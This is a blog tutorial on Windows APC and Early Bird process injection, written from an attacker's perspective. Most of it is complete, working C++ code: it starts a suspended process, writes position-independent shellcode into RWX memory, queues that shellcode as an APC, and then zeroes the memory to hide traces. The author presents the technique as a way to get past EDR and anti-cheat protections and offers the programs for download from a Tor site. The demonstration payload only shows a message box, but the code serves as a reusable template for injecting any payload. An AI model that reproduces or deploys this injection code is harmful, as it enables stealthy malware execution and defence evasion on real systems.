APC and Early Bird Injections

"I feel sick"

May 27, 2023

Hello all. This is most likely the last injection technique I will discuss for a while. Maybe. Anyways, today we’re talking about Windows Asynchronous Procedure Calls (APCs). Within this context are 2 injection methods.

Before You Read

It is recommended to read these related posts before reading this one, so that you don’t get lost during the discussion of the concepts:

What

Firstly, we need to know about APCs. APCs are literally their name. They are functions that execute asynchronously in a thread. Every thread has their own queue of APCs which can run while the thread is awake or in what’s called an alertable state.

If you are a malicious actor, you could ask a process’ APC queue to run some malicious code for you. In some cases, you can inject yourself into a process.

Under this wing of APC injection, there is also an injection method that allows the process to be injected before it fully loads. This is called Early Bird injection.

Some processes and/or AVs have their own protection methods against being hijacked, however, in some cases, these are initialized after the process starts. Therefore, if there was a way to inject before these systems start up, you could disable them entirely and prevent them from loading.

Why

Most EDRs scan the functions that are attached to process APC queues, so if you are able to encrypt your payload (or be able to deploy some assembly wrapping), you might be able to bypass them.

But, as to why… well, they’re cool!

How

It’s been a while since I’ve uploaded anything to my Tor site. So I’ve uploaded some stuff for you there. It’s in apc.zip under the programs/ folder.

In here are 2 programs, helloworld.exe and earlybird.exe. Let’s discuss.

First, helloworld.exe is very simple. It just prints “Hello, world!”. The reason why this is included is because helloworld.exe does this in the main() function. This happens rather immediately, and because of this, it might be difficult to run some malicious code before the main() function starts. This is where early bird injections come into play.

Since early bird injections start a process in suspended mode, this prevents the main() function from executing. In fact, this prevents a lot from happening. You can’t even iterate a process’ modules this early. Even global constructors don’t execute this early, which means this prevents mainCRTStartup() (the implicit function that calls main()) from executing as well.

This is beneficial, because there might be some defensive mechanisms that take place in the main() function or in global constructors. In fact, some video game anti-cheats do this. Not telling which ones, though :).

So, let’s now look at earlybird.cpp, part by part.

First of all, contrary to every other injection method, early bird injections require a path to an executable, rather than its name/pid.

Secondly, once acquiring a path to the executable, it calls CreateProcess(A) and passes CREATE_SUSPENDED to the API.

int main(int argc, char **argv)
{
	if (argc < 2)
	{
		std::cout << "Usage: " << argv[0] << " <filepath>" << std::endl;
		return 1;
	}

	char* filepath = argv[1];
	// Create suspended process at filepath
	STARTUPINFOA si{};
	PROCESS_INFORMATION pi{};
	if (!CreateProcessA(filepath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
	{
		std::cout << "Failed to create process. Is your path correct? Error " << GetLastError() << std::endl;
		return 1;
	}

Then, it allocates some RWX memory and copies the shellcode (we’ll get to that later, it’s a bit of a doozy) to the freshly allocated section. “Shellcode” is the name of the shellcode function.

	void* shellcode = VirtualAllocEx(pi.hProcess, NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!shellcode)
	{
		std::cout << "Failed to allocate memory in process. Error " << GetLastError() << std::endl;
		return 1;
	}

	// Write shellcode to process
	if (!WriteProcessMemory(pi.hProcess, shellcode, Shellcode, 0x1000, NULL))
	{
		std::cout << "Failed to write shellcode to process. Error " << GetLastError() << std::endl;
		return 1;
	}

Now, all that’s left is to queue the APC and then resume the thread.

	// Queue APC
	if (!QueueUserAPC((PAPCFUNC)shellcode, pi.hThread, NULL))
	{
		std::cout << "Failed to queue APC. Error " << GetLastError() << std::endl;
		return 1;
	}

	// Resume thread
	if (!ResumeThread(pi.hThread))
	{
		std::cout << "Failed to resume thread. Error " << GetLastError() << std::endl;
		return 1;
	}

That’s it. When the thread is resumed, it enters an “alertable” state, and then executes any functions in its APC queue, which would be before it runs main()!

If we want to be sneaky (we do), we can wait for the thread to finish and then zero out the memory we just allocated. Then we can free it.

	// Wait for thread to finish
	WaitForSingleObject(pi.hThread, INFINITE);

	// Free memory
	BYTE zeroed[0x1000]{};
	WriteProcessMemory(pi.hProcess, shellcode, zeroed, 0x1000, NULL);
	VirtualFreeEx(pi.hProcess, shellcode, 0, MEM_RELEASE);

	// Close handles
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return 0;
}

Now, let’s talk shellcode.

Contrary to the shellcode I oftentimes use, I did not want to write all of it by hand. Hell no.

Because, in this example, instead of doing any hooks or whatever, I just launched a MessageBox. Since MessageBox suspends the calling thread while the box is open, you could clearly see that it would be executed and opened before “Hello, world!” is printed. I could’ve just passed the address of MessageBoxA as a pointer to the shellcode too, but that’s not very fun. (Also, it might not have worked if the module wasn’t loaded?). Anyways, let’s start talking shellcode.

First, we need to walk the PEB. By walking the PEB, we can retrieve the address of KERNELBASE.dll which holds the address of LoadLibraryA and GetProcAddress in its export address table (EAT), which we need to get the address of MessageBoxA.

Doing this by hand in assembly would suck, so we just write some basic C code that 1: doesn’t use any global addressing (strings, global variables) or 2: doesn’t use any non-inlined function calls.

Lastly, this is x64 shellcode. If you want to use x86, change __readgsqword(0x60) to __readgsqword(0x30) and it might work. Maybe.

NTSTATUS Shellcode(ULONG_PTR param)
{
	// Walk the PEB until we find KERNELBASE
	wchar_t stackKB[] = {'K', 'E', 'R', 'N', 'E', 'L', 'B', 'A', 'S', 'E', '.', 'd', 'l', 'l', 0};
	HMODULE hKB = 0;

	PPEB peb = (PPEB)__readgsqword(0x60);
	PPEB_LDR_DATA ldr = peb->Ldr;

	for (PLIST_ENTRY entry = ldr->InMemoryOrderModuleList.Flink; entry != &ldr->InMemoryOrderModuleList; entry = entry->Flink)
	{
		PLDR_DATA_TABLE_ENTRY mod = CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
		if (mod->DllBase == nullptr)
			continue;

		wchar_t *modName = (wchar_t *)mod->FullDllName.Buffer;
		// Strip path
		wchar_t *stripped = modName + mod->FullDllName.Length / sizeof(wchar_t);
		while (stripped != modName && *stripped != '\\')
			stripped--;
		if (*stripped == '\\')
			stripped++;

		// Compare
		if (__wcscmp(stripped, stackKB) == 0)
		{
			hKB = (HMODULE)mod->DllBase;
			break;
		}
	}

	// Crash if kernelbase doesn't exist (running on XP or native app)
	if (hKB == 0)
	{
		***(char ***)0 = 0;
	}

A few things to note here.

Strings are allocated on the stack, rather than retrieved from the .rdata section. This should be obvious since referencing anything from the .rdata section, which internally is just a load from a relative address, from a shellcode environment would definitely cause a segfault unless you embed the entire program as your payload, which would be a bit loud.
Since loader entry DLL names are held as the full path, rather than just the base DLL name, we need to strip out the prepended path to retrieve the base DLL name. Rather straightforward.
There are, of course no calls to any functions or imports. Or are there? You may have noticed __wcscmp. What could this be? This is just an inlined function that I wrote. I also wrote one for char* too instead of just wchar_t*.

__forceinline ptrdiff_t __strcmp(const char *s1, const char *s2)
{
	while (*s1 && (*s1 == *s2))
		s1++, s2++;
	return *(const unsigned char *)s1 - *(const unsigned char *)s2;
}

__forceinline ptrdiff_t __wcscmp(const wchar_t *s1, const wchar_t *s2)
{
	while (*s1 && (*s1 == *s2))
		s1++, s2++;
	return *(const unsigned short *)s1 - *(const unsigned short *)s2;
}

Note that __forceinline doesn’t always force inlining. It depends on the optimization settings that you send to the compiler. In this case, it inlines these so they are included in the singular Shellcode function. This simply helps legibility.

Next, need to retrieve LoadLibraryA and GetProcAddress. This is done by parsing the PE header of KERNELBASE to iterate over its EAT and grab these.

	// Important functions
	decltype(&LoadLibraryA) pLoadLibraryA = nullptr;
	decltype(&GetProcAddress) pGetProcAddress = nullptr;

	char stackLLA[] = {'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', 0};
	char stackGPA[] = {'G', 'e', 't', 'P', 'r', 'o', 'c', 'A', 'd', 'd', 'r', 'e', 's', 's', 0};

	// Get DOS header
	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hKB;
	// Get NT headers
	PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hKB + dosHeader->e_lfanew);
	// Get export directory
	PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)hKB + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
	// Get address of names
	DWORD *names = (DWORD *)((DWORD_PTR)hKB + exportDirectory->AddressOfNames);
	// Get address of functions
	DWORD *functions = (DWORD *)((DWORD_PTR)hKB + exportDirectory->AddressOfFunctions);
	// Get address of ordinals
	WORD *ordinals = (WORD *)((DWORD_PTR)hKB + exportDirectory->AddressOfNameOrdinals);

	// Loop through names
	for (size_t i = 0; i < exportDirectory->NumberOfNames; i++)
	{
		// Get name
		char *namePtr = (char *)((DWORD_PTR)hKB + names[i]);
		// Compare name
		if (!__strcmp(namePtr, stackLLA))
		{
			pLoadLibraryA = (decltype(&LoadLibraryA))((DWORD_PTR)hKB + functions[ordinals[i]]);
			// Get address of function
		}
		else if (!__strcmp(namePtr, stackGPA))
		{
			// Get address of function
			pGetProcAddress = (decltype(&GetProcAddress))((DWORD_PTR)hKB + functions[ordinals[i]]);
		}
	}

The use of decltype is a compile-time keyword, so this doesn’t inherently induce a requirement of the function that is type-decl’d. This is also rather straightforward.

Lastly, get the address of MessageBoxA and call it.

// Get address of MessageBoxA
	char stackMBA[] = {'M', 'e', 's', 's', 'a', 'g', 'e', 'B', 'o', 'x', 'A', 0};
	char stackU32[] = {'u', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0};
	decltype(&MessageBoxA) pMessageBoxA = (decltype(&MessageBoxA))pGetProcAddress(pLoadLibraryA(stackU32), stackMBA);

	// Call MessageBoxA
	char stackHello[] = {'H', 'e', 'l', 'l', 'o', ',', ' ', 'w', 'o', 'r', 'l', 'd', '!', 0};
	pMessageBoxA(NULL, stackHello, stackHello, MB_OK);
	return 0;
}

That’s it. But when you compile this program pass these parameters so you don’t end up crashing.

cl .\earlybird.cpp /EHsc /GS- /O2

/EHsc is for unwind information/exception handling. This is required if you use any functions that deploy a try/except, which is std::cout in this case.

/GS- dictates the compiler to not use a security cookie or stack protection. If you have this enabled, your shellcode will invoke an implicit call to a random address that will definitely cause a segfault.

/O2 is for optimizations favoring speed. This speeds up the execution of the program in general, but also obeys the forced inlining of those string comparison functions.

I’ve included a .bat file for you to build without copying and pasting more stuff. Look how nice I am. Just run it from the MSVC x64 native command prompt.

Now, all that’s left to do is to run it.

Let’s run helloworld.exe first.